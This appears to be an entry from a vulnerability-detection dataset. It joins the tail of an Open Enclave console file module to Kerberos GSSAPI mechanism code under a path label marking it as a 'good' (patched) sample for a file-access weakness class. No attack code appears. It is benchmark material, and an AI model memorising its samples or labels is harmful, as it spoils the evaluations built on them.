static oe_host_fd_t _consolefs_gethostfd(oe_fd_t* file_)
{
oe_host_fd_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
ret = file->host_fd;
done:
return ret;
}
static oe_off_t _consolefs_lseek(oe_fd_t* file_, oe_off_t offset, int whence)
{
oe_off_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(offset);
OE_UNUSED(whence);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pread(
oe_fd_t* file_,
void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pwrite(
oe_fd_t* file_,
const void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static int _consolefs_close(oe_fd_t* file_)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/* Ask the host to perform this operation. */
{
if (oe_syscall_close_ocall(&ret, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (ret == -1)
OE_RAISE_ERRNO(oe_errno);
}
/* Free the file structure. */
oe_free(file);
done:
return ret;
}
static int _consolefs_getdents64(
oe_fd_t* file,
struct oe_dirent* dirp,
uint32_t count)
{
OE_UNUSED(file);
OE_UNUSED(dirp);
OE_UNUSED(count);
/* The standard devices are not directories, so this is unsupported. */
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fstat(oe_fd_t* file, struct oe_stat_t* buf)
{
OE_UNUSED(file);
OE_UNUSED(buf);
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fsync(oe_fd_t* file)
{
OE_UNUSED(file);
OE_RAISE_ERRNO(OE_EINVAL);
done:
return -1;
}
static oe_file_ops_t _ops = {
.fd.read = _consolefs_read,
.fd.write = _consolefs_write,
.fd.readv = _consolefs_readv,
.fd.writev = _consolefs_writev,
.fd.dup = _consolefs_dup,
.fd.ioctl = _consolefs_ioctl,
.fd.fcntl = _consolefs_fcntl,
.fd.close = _consolefs_close,
.fd.get_host_fd = _consolefs_gethostfd,
.lseek = _consolefs_lseek,
.pread = _consolefs_pread,
.pwrite = _consolefs_pwrite,
.getdents64 = _consolefs_getdents64,
.fstat = _consolefs_fstat,
.fsync = _consolefs_fsync,
.fdatasync = _consolefs_fsync,
};
static oe_file_ops_t _get_ops(void)
{
return _ops;
}
static oe_fd_t* _new_file(uint32_t fileno)
{
oe_fd_t* ret = NULL;
file_t* file = NULL;
if (fileno > OE_STDERR_FILENO)
goto done;
/* Create the file struct. */
{
if (!(file = oe_calloc(1, sizeof(file_t))))
goto done;
file->base.type = OE_FD_TYPE_FILE;
file->base.ops.file = _ops;
file->magic = MAGIC;
}
/* Ask the host to duplicate the file descriptor. */
{
oe_host_fd_t retval;
if (oe_syscall_dup_ocall(&retval, fileno) != OE_OK)
goto done;
if (retval < 0)
goto done;
file->host_fd = retval;
}
ret = &file->base;
file = NULL;
done:
if (file)
oe_free(file);
return ret;
}
oe_fd_t* oe_consolefs_create_file(uint32_t fileno)
{
switch (fileno)
{
case OE_STDIN_FILENO:
return _new_file(OE_STDIN_FILENO);
case OE_STDOUT_FILENO:
return _new_file(OE_STDOUT_FILENO);
case OE_STDERR_FILENO:
return _new_file(OE_STDERR_FILENO);
default:
return NULL;
}
}
| ./CrossVul/dataset_final_sorted/CWE-552/c/good_4170_4 |
crossvul-cpp_data_good_1535_1 | /* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright 1993 by OpenVision Technologies, Inc.
*
* Permission to use, copy, modify, distribute, and sell this software
* and its documentation for any purpose is hereby granted without fee,
* provided that the above copyright notice appears in all copies and
* that both that copyright notice and this permission notice appear in
* supporting documentation, and that the name of OpenVision not be used
* in advertising or publicity pertaining to distribution of the software
* without specific, written prior permission. OpenVision makes no
* representations about the suitability of this software for any
* purpose. It is provided "as is" without express or implied warranty.
*
* OPENVISION DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO
* EVENT SHALL OPENVISION BE LIABLE FOR ANY SPECIAL, INDIRECT OR
* CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
* USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
* OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
* PERFORMANCE OF THIS SOFTWARE.
*/
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/*
* Copyright (c) 2006-2008, Novell, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * The copyright holder's name is not used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*
* $Id$
*/
/* For declaration of krb5_ser_context_init */
#include "k5-int.h"
#include "gssapiP_krb5.h"
#include "mglueP.h"
#ifndef NO_PASSWORD
#include <pwd.h>
#endif
/** exported constants defined in gssapi_krb5{,_nx}.h **/
/* these are bogus, but will compile */
/*
* The OID of the draft krb5 mechanism, assigned by IETF, is:
* iso(1) org(3) dod(5) internet(1) security(5)
* kerberosv5(2) = 1.3.5.1.5.2
* The OID of the krb5_name type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1) = 1.2.840.113554.1.2.2.1
* The OID of the krb5_principal type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_principal(2) = 1.2.840.113554.1.2.2.2
* The OID of the proposed standard krb5 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) = 1.2.840.113554.1.2.2
* The OID of the proposed standard krb5 v2 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5v2(3) = 1.2.840.113554.1.2.3
* Provisionally reserved for Kerberos session key algorithm
* identifiers is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_enctype(4) = 1.2.840.113554.1.2.2.4
* Provisionally reserved for Kerberos mechanism-specific APIs:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_gssapi_ext(5) = 1.2.840.113554.1.2.2.5
*/
/*
* Encoding rules: The first two values are encoded in one byte as 40
* * value1 + value2. Subsequent values are encoded base 128, most
* significant digit first, with the high bit (\200) set on all octets
* except the last in each value's encoding.
*/
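/*
 * Illustrative sketch (not part of the original source): applying the
 * encoding rules above to the RFC krb5 mechanism OID 1.2.840.113554.1.2.2.
 * The helper below is hypothetical and compiled out; it only demonstrates
 * the arithmetic.  The first octet packs the first two arcs: 40*1 + 2 =
 * 0x2A.  Each later arc is written base 128, most significant digit first,
 * with 0x80 set on every octet except the last, so 840 -> 0x86 0x48 and
 * 113554 -> 0x86 0xF7 0x12, giving "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"
 * (GSS_MECH_KRB5_OID).
 */
#if 0
static size_t
example_encode_oid_arc(unsigned long arc, unsigned char *out)
{
unsigned char tmp[10];
size_t n = 0, i;
/* Collect the base-128 digits, least significant first. */
do {
tmp[n++] = (unsigned char)(arc & 0x7f);
arc >>= 7;
} while (arc != 0);
/* Emit most significant digit first, setting the high bit on all octets
 * except the last. */
for (i = 0; i < n; i++)
out[i] = (unsigned char)(tmp[n - 1 - i] | ((i + 1 < n) ? 0x80 : 0));
return n;
}
#endif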
#define NO_CI_FLAGS_X_OID_LENGTH 6
#define NO_CI_FLAGS_X_OID "\x2a\x85\x70\x2b\x0d\x1d"
const gss_OID_desc krb5_gss_oid_array[] = {
/* this is the official, rfc-specified OID */
{GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID},
/* this pre-RFC mech OID */
{GSS_MECH_KRB5_OLD_OID_LENGTH, GSS_MECH_KRB5_OLD_OID},
/* this is the unofficial, incorrect mech OID emitted by MS */
{GSS_MECH_KRB5_WRONG_OID_LENGTH, GSS_MECH_KRB5_WRONG_OID},
/* IAKERB OID */
{GSS_MECH_IAKERB_OID_LENGTH, GSS_MECH_IAKERB_OID},
/* this is the v2 assigned OID */
{9, "\052\206\110\206\367\022\001\002\003"},
/* these two are name type OID's */
/* 2.1.1. Kerberos Principal Name Form: (rfc 1964)
* This name form shall be represented by the Object Identifier {iso(1)
* member-body(2) United States(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1)}. The recommended symbolic name for this type
* is "GSS_KRB5_NT_PRINCIPAL_NAME". */
{10, "\052\206\110\206\367\022\001\002\002\001"},
/* gss_nt_krb5_principal. Object identifier for a krb5_principal. Do not use. */
{10, "\052\206\110\206\367\022\001\002\002\002"},
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
{ 0, 0 }
};
const gss_OID_desc * const gss_mech_krb5 = krb5_gss_oid_array+0;
const gss_OID_desc * const gss_mech_krb5_old = krb5_gss_oid_array+1;
const gss_OID_desc * const gss_mech_krb5_wrong = krb5_gss_oid_array+2;
const gss_OID_desc * const gss_mech_iakerb = krb5_gss_oid_array+3;
const gss_OID_desc * const gss_nt_krb5_name = krb5_gss_oid_array+5;
const gss_OID_desc * const gss_nt_krb5_principal = krb5_gss_oid_array+6;
const gss_OID_desc * const GSS_KRB5_NT_PRINCIPAL_NAME = krb5_gss_oid_array+5;
const gss_OID_desc * const GSS_KRB5_CRED_NO_CI_FLAGS_X = krb5_gss_oid_array+7;
static const gss_OID_set_desc oidsets[] = {
{1, (gss_OID) krb5_gss_oid_array+0}, /* RFC OID */
{1, (gss_OID) krb5_gss_oid_array+1}, /* pre-RFC OID */
{3, (gss_OID) krb5_gss_oid_array+0}, /* all names for krb5 mech */
{4, (gss_OID) krb5_gss_oid_array+0}, /* all krb5 names and IAKERB */
};
const gss_OID_set_desc * const gss_mech_set_krb5 = oidsets+0;
const gss_OID_set_desc * const gss_mech_set_krb5_old = oidsets+1;
const gss_OID_set_desc * const gss_mech_set_krb5_both = oidsets+2;
const gss_OID_set_desc * const kg_all_mechs = oidsets+3;
g_set kg_vdb = G_SET_INIT;
/** default credential support */
/*
* init_sec_context() will explicitly re-acquire default credentials,
* so handling the expiration/invalidation condition here isn't needed.
*/
OM_uint32
kg_get_defcred(minor_status, cred)
OM_uint32 *minor_status;
gss_cred_id_t *cred;
{
OM_uint32 major;
if ((major = krb5_gss_acquire_cred(minor_status,
(gss_name_t) NULL, GSS_C_INDEFINITE,
GSS_C_NULL_OID_SET, GSS_C_INITIATE,
cred, NULL, NULL)) && GSS_ERROR(major)) {
return(major);
}
*minor_status = 0;
return(GSS_S_COMPLETE);
}
OM_uint32
kg_sync_ccache_name (krb5_context context, OM_uint32 *minor_status)
{
OM_uint32 err = 0;
/*
* Sync up the context ccache name with the GSSAPI ccache name.
* If kg_ccache_name is NULL -- normal unless someone has called
* gss_krb5_ccache_name() -- then the system default ccache will
* be picked up and used by resetting the context default ccache.
* This is needed for platforms which support multiple ccaches.
*/
if (!err) {
/* if NULL, resets the context default ccache */
err = krb5_cc_set_default_name(context,
(char *) k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME));
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
/* This function returns whether or not the caller set a ccache name. Used by
* gss_acquire_cred to figure out if the caller wants to only look at this
* ccache or search the cache collection for the desired name */
OM_uint32
kg_caller_provided_ccache_name (OM_uint32 *minor_status,
int *out_caller_provided_name)
{
if (out_caller_provided_name) {
*out_caller_provided_name =
(k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME) != NULL);
}
*minor_status = 0;
return GSS_S_COMPLETE;
}
OM_uint32
kg_get_ccache_name (OM_uint32 *minor_status, const char **out_name)
{
const char *name = NULL;
OM_uint32 err = 0;
char *kg_ccache_name;
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
if (kg_ccache_name != NULL) {
name = strdup(kg_ccache_name);
if (name == NULL)
err = ENOMEM;
} else {
krb5_context context = NULL;
/* Reset the context default ccache (see text above), and then
retrieve it. */
err = krb5_gss_init_context(&context);
if (!err)
err = krb5_cc_set_default_name (context, NULL);
if (!err) {
name = krb5_cc_default_name(context);
if (name) {
name = strdup(name);
if (name == NULL)
err = ENOMEM;
}
}
if (err && context)
save_error_info(err, context);
if (context)
krb5_free_context(context);
}
if (!err) {
if (out_name) {
*out_name = name;
}
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
OM_uint32
kg_set_ccache_name (OM_uint32 *minor_status, const char *name)
{
char *new_name = NULL;
char *swap = NULL;
char *kg_ccache_name;
krb5_error_code kerr;
if (name) {
new_name = strdup(name);
if (new_name == NULL) {
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
}
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
swap = kg_ccache_name;
kg_ccache_name = new_name;
new_name = swap;
kerr = k5_setspecific(K5_KEY_GSS_KRB5_CCACHE_NAME, kg_ccache_name);
if (kerr != 0) {
/* Can't store, so free up the storage. */
free(kg_ccache_name);
/* ??? free(new_name); */
*minor_status = kerr;
return GSS_S_FAILURE;
}
free (new_name);
*minor_status = 0;
return GSS_S_COMPLETE;
}
#define g_OID_prefix_equal(o1, o2) \
(((o1)->length >= (o2)->length) && \
(memcmp((o1)->elements, (o2)->elements, (o2)->length) == 0))
/*
* gss_inquire_sec_context_by_oid() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_ctx_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_sec_context_by_oid_ops[] = {
{
{GSS_KRB5_GET_TKT_FLAGS_OID_LENGTH, GSS_KRB5_GET_TKT_FLAGS_OID},
gss_krb5int_get_tkt_flags
},
{
{GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authz_data_from_sec_context
},
{
{GSS_KRB5_INQ_SSPI_SESSION_KEY_OID_LENGTH, GSS_KRB5_INQ_SSPI_SESSION_KEY_OID},
gss_krb5int_inq_session_key
},
{
{GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID},
gss_krb5int_export_lucid_sec_context
},
{
{GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authtime_from_sec_context
}
};
OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_sec_context_by_oid (OM_uint32 *minor_status,
const gss_ctx_id_t context_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
krb5_gss_ctx_id_rec *ctx;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
ctx = (krb5_gss_ctx_id_rec *) context_handle;
if (ctx->terminated || !ctx->established)
return GSS_S_NO_CONTEXT;
for (i = 0; i < sizeof(krb5_gss_inquire_sec_context_by_oid_ops)/
sizeof(krb5_gss_inquire_sec_context_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_sec_context_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_sec_context_by_oid_ops[i].func)(minor_status,
context_handle,
desired_object,
data_set);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_inquire_cred_by_oid() methods
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_cred_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_cred_by_oid_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_cred_by_oid(OM_uint32 *minor_status,
const gss_cred_id_t cred_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
OM_uint32 major_status = GSS_S_FAILURE;
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
if (cred_handle == GSS_C_NO_CREDENTIAL) {
*minor_status = (OM_uint32)KRB5_NOCREDS_SUPPLIED;
return GSS_S_NO_CRED;
}
major_status = krb5_gss_validate_cred(minor_status, cred_handle);
if (GSS_ERROR(major_status))
return major_status;
#if 0
for (i = 0; i < sizeof(krb5_gss_inquire_cred_by_oid_ops)/
sizeof(krb5_gss_inquire_cred_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_cred_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_cred_by_oid_ops[i].func)(minor_status,
cred_handle,
desired_object,
data_set);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_set_sec_context_option() methods
* (Disabled until we have something to populate the array.)
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_ctx_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gss_set_sec_context_option_ops[] = {
};
#endif
OM_uint32 KRB5_CALLCONV
krb5_gss_set_sec_context_option (OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (context_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_READ;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
#if 0
for (i = 0; i < sizeof(krb5_gss_set_sec_context_option_ops)/
sizeof(krb5_gss_set_sec_context_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_set_sec_context_option_ops[i].oid)) {
return (*krb5_gss_set_sec_context_option_ops[i].func)(minor_status,
context_handle,
desired_object,
value);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
static OM_uint32
no_ci_flags(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_oid,
const gss_buffer_t value)
{
krb5_gss_cred_id_t cred;
cred = (krb5_gss_cred_id_t) *cred_handle;
cred->suppress_ci_flags = 1;
*minor_status = 0;
return GSS_S_COMPLETE;
}
/*
* gssspi_set_cred_option() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_cred_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gssspi_set_cred_option_ops[] = {
{
{GSS_KRB5_COPY_CCACHE_OID_LENGTH, GSS_KRB5_COPY_CCACHE_OID},
gss_krb5int_copy_ccache
},
{
{GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID_LENGTH, GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID},
gss_krb5int_set_allowable_enctypes
},
{
{GSS_KRB5_SET_CRED_RCACHE_OID_LENGTH, GSS_KRB5_SET_CRED_RCACHE_OID},
gss_krb5int_set_cred_rcache
},
{
{GSS_KRB5_IMPORT_CRED_OID_LENGTH, GSS_KRB5_IMPORT_CRED_OID},
gss_krb5int_import_cred
},
{
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
no_ci_flags
},
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_set_cred_option(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
OM_uint32 major_status = GSS_S_FAILURE;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
if (cred_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (*cred_handle != GSS_C_NO_CREDENTIAL) {
major_status = krb5_gss_validate_cred(minor_status, *cred_handle);
if (GSS_ERROR(major_status))
return major_status;
}
for (i = 0; i < sizeof(krb5_gssspi_set_cred_option_ops)/
sizeof(krb5_gssspi_set_cred_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_set_cred_option_ops[i].oid)) {
return (*krb5_gssspi_set_cred_option_ops[i].func)(minor_status,
cred_handle,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gssspi_mech_invoke() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_OID, const gss_OID, gss_buffer_t);
} krb5_gssspi_mech_invoke_ops[] = {
{
{GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID_LENGTH, GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID},
gss_krb5int_register_acceptor_identity
},
{
{GSS_KRB5_CCACHE_NAME_OID_LENGTH, GSS_KRB5_CCACHE_NAME_OID},
gss_krb5int_ccache_name
},
{
{GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID},
gss_krb5int_free_lucid_sec_context
},
#ifndef _WIN32
{
{GSS_KRB5_USE_KDC_CONTEXT_OID_LENGTH, GSS_KRB5_USE_KDC_CONTEXT_OID},
krb5int_gss_use_kdc_context
},
#endif
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_mech_invoke (OM_uint32 *minor_status,
const gss_OID desired_mech,
const gss_OID desired_object,
gss_buffer_t value)
{
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_mech == GSS_C_NO_OID)
return GSS_S_BAD_MECH;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
for (i = 0; i < sizeof(krb5_gssspi_mech_invoke_ops)/
sizeof(krb5_gssspi_mech_invoke_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_mech_invoke_ops[i].oid)) {
return (*krb5_gssspi_mech_invoke_ops[i].func)(minor_status,
desired_mech,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
#define GS2_KRB5_SASL_NAME "GS2-KRB5"
#define GS2_KRB5_SASL_NAME_LEN (sizeof(GS2_KRB5_SASL_NAME) - 1)
#define GS2_IAKERB_SASL_NAME "GS2-IAKERB"
#define GS2_IAKERB_SASL_NAME_LEN (sizeof(GS2_IAKERB_SASL_NAME) - 1)
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_mech_for_saslname(OM_uint32 *minor_status,
const gss_buffer_t sasl_mech_name,
gss_OID *mech_type)
{
*minor_status = 0;
if (sasl_mech_name->length == GS2_KRB5_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_KRB5_SASL_NAME, GS2_KRB5_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_krb5;
return GSS_S_COMPLETE;
} else if (sasl_mech_name->length == GS2_IAKERB_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_IAKERB_SASL_NAME, GS2_IAKERB_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_iakerb;
return GSS_S_COMPLETE;
}
return GSS_S_BAD_MECH;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_saslname_for_mech(OM_uint32 *minor_status,
const gss_OID desired_mech,
gss_buffer_t sasl_mech_name,
gss_buffer_t mech_name,
gss_buffer_t mech_description)
{
if (g_OID_equal(desired_mech, gss_mech_iakerb)) {
if (!g_make_string_buffer(GS2_IAKERB_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("iakerb", mech_name) ||
!g_make_string_buffer("Initial and Pass Through Authentication "
"Kerberos Mechanism (IAKERB)",
mech_description))
goto fail;
} else {
if (!g_make_string_buffer(GS2_KRB5_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("krb5", mech_name) ||
!g_make_string_buffer("Kerberos 5 GSS-API Mechanism",
mech_description))
goto fail;
}
*minor_status = 0;
return GSS_S_COMPLETE;
fail:
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_attrs_for_mech(OM_uint32 *minor_status,
gss_const_OID mech,
gss_OID_set *mech_attrs,
gss_OID_set *known_mech_attrs)
{
OM_uint32 major, tmpMinor;
if (mech_attrs == NULL) {
*minor_status = 0;
return GSS_S_COMPLETE;
}
major = gss_create_empty_oid_set(minor_status, mech_attrs);
if (GSS_ERROR(major))
goto cleanup;
#define MA_SUPPORTED(ma) do { \
major = gss_add_oid_set_member(minor_status, (gss_OID)ma, \
mech_attrs); \
if (GSS_ERROR(major)) \
goto cleanup; \
} while (0)
MA_SUPPORTED(GSS_C_MA_MECH_CONCRETE);
MA_SUPPORTED(GSS_C_MA_ITOK_FRAMED);
MA_SUPPORTED(GSS_C_MA_AUTH_INIT);
MA_SUPPORTED(GSS_C_MA_AUTH_TARG);
MA_SUPPORTED(GSS_C_MA_DELEG_CRED);
MA_SUPPORTED(GSS_C_MA_INTEG_PROT);
MA_SUPPORTED(GSS_C_MA_CONF_PROT);
MA_SUPPORTED(GSS_C_MA_MIC);
MA_SUPPORTED(GSS_C_MA_WRAP);
MA_SUPPORTED(GSS_C_MA_PROT_READY);
MA_SUPPORTED(GSS_C_MA_REPLAY_DET);
MA_SUPPORTED(GSS_C_MA_OOS_DET);
MA_SUPPORTED(GSS_C_MA_CBINDINGS);
MA_SUPPORTED(GSS_C_MA_CTX_TRANS);
if (g_OID_equal(mech, gss_mech_iakerb)) {
MA_SUPPORTED(GSS_C_MA_AUTH_INIT_INIT);
MA_SUPPORTED(GSS_C_MA_NOT_DFLT_MECH);
} else if (!g_OID_equal(mech, gss_mech_krb5)) {
MA_SUPPORTED(GSS_C_MA_DEPRECATED);
}
cleanup:
if (GSS_ERROR(major))
gss_release_oid_set(&tmpMinor, mech_attrs);
return major;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_localname(OM_uint32 *minor,
const gss_name_t pname,
const gss_const_OID mech_type,
gss_buffer_t localname)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char lname[BUFSIZ];
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_aname_to_localname(context, kname->princ,
sizeof(lname), lname);
if (code != 0) {
*minor = KRB5_NO_LOCALNAME;
krb5_free_context(context);
return GSS_S_FAILURE;
}
krb5_free_context(context);
